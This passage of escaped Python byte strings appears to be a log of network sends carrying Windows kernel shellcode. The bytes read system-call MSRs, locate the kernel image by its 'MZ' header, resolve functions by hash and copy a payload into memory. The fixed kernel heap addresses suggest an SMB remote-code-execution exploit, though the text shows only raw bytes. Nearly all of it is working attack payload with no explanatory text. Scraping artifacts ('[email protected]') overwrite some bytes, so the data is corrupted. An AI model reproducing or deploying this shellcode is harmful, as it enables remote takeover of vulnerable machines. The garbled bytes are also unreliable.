\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 15, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
